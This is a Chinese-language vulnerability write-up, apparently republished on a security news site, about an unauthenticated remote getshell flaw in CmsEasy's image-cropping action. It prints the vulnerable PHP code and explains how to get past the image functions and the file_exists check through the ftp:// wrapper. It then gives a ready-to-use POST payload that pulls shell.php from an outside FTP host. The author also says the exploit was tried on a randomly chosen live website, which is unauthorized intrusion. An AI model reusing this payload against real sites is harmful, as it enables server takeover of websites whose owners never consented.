酷应用

CmsEasy 前台无限制getshell

技术 作者:HackerEye 2018-08-24 09:22:31
发布时间:2016-09-29 公开时间:N/A 漏洞类型:getshell 危害等级:高 漏洞编号:QTVA-2016-540503 测试版本:20160825

漏洞详情

lib/default/tool_act.php 行392 
function cut_image_action() {
        $len = 1;
        if(config::get('base_url') != '/'){
                $len = strlen(config::get('base_url'))+1;
        }
        if(substr($_POST['pic'],0,4) == 'http'){
                front::$post['thumb'] = str_ireplace(config::get('site_url'),'',$_POST['pic']);
        }else{
                front::$post['thumb'] = substr($_POST['pic'],$len);
        }
        
        $thumb=new thumb();
        $thumb->set(front::$post['thumb'],'jpg');
        $img=$thumb->create_image($thumb->im,$_POST['w'],$_POST['h'],0,0,$_POST['x1'],$_POST['y1'],$_POST['x2'] -$_POST['x1'],$_POST['y2'] -$_POST['y1']);
        $new_name=$new_name_gbk=str_replace('.','',Time::getMicrotime()).'.'.end(explode('.',$_POST['pic']));
        $save_file='upload/images/'.date('Ym').'/'.$new_name;
        @mkdir(dirname(ROOT.'/'.$save_file));
        ob_start();
        $thumb->out_image($img,null,85);
        file_put_contents(ROOT.'/'.$save_file,ob_get_contents());
        ob_end_clean();
        $image_url=config::get('base_url').'/'.$save_file;
        //$res['size']=ceil(strlen($img) / 1024);
        $res['code']="
                 //$('#cut_preview').attr('src','$image_url');
                 $('#thumb').val('$image_url');
                                 alert(lang('save_success'));
                ";
        echo json::encode($res);
    }
没有判断pic的后缀就直接取了 
$new_name=$new_name_gbk=str_replace('.','',Time::getMicrotime()).'.'.end(explode('.',$_POST['pic']));
做为文件名字 导致getshell 此处的坑是
  1. 需要过ImageCreateFromxxxImageCopyResampledImageJpeg 3个函数 任然保留shell语句
  2. 需要通过file_exists函数的验证
第一个坑就不说怎么绕过的了 各种fuzz就是了 第二个坑 file_exists并不能判断远程http(s)文件是否存在 固定返回false 查阅manual得知
自 PHP 5.0.0 起, 此函数也用于某些 URL 包装器。请参见 支持的协议和封装协议以获得支持 stat() 系列函数功能的包装器列表。
查了下各种封装协议wrappers发现了 ftp:// 支持 stat();
Attribute PHP4 PHP5
Supports stat() No As of PHP 5.0.0: filesize(), filetype(), file_exists(), is_file(), and is_dir() elements only.
--- --- As of PHP 5.1.0: filemtime().
5.0.0以上 就支持file_exists()了 接下来就是根据要求构造payload 
$len = 1;
if(config::get('base_url') != '/'){
    $len = strlen(config::get('base_url'))+1;
}
if(substr($_POST['pic'],0,4) == 'http'){
    front::$post['thumb'] =             str_ireplace(config::get('site_url'),'',$_POST['pic']);
}else{
    front::$post['thumb'] = substr($_POST['pic'],$len);
}
如果站点不是放在根目录 则需要在payload前面补足 strlen(base_url)+2 位的长度 如果在根目录也要补1POST /index.php?case=tool&act=cut_image pic=111111111ftp://ludas.pw/shell.php&w=228&h=146&x1=0&x2=228&y1=0&y2=146 本地测试截图
image
互联网随便找了个站
image
作者:索马里的乌贼 链接:https://www.jianshu.com/p/fac379dcbd1e

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

*文章为作者独立观点,不代表 爱尖刀 立场
本文由 HackerEye发表,转载此文章须经作者同意,并请附上出处( 爱尖刀 )及本页链接。
原文链接 https://www.ijiandao.com/safe/cto/156598.html
CmsEasy
图库
HackerEye HackerEye
公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接
百度热搜榜
排名 热点 搜索指数
iTrust
AiDeep Ued
关于我们 联系我们 升级日志 法律声明 广告服务 侵删通道
Copyright © 2021 K2CMS All rights reserved.
京ICP备14006288号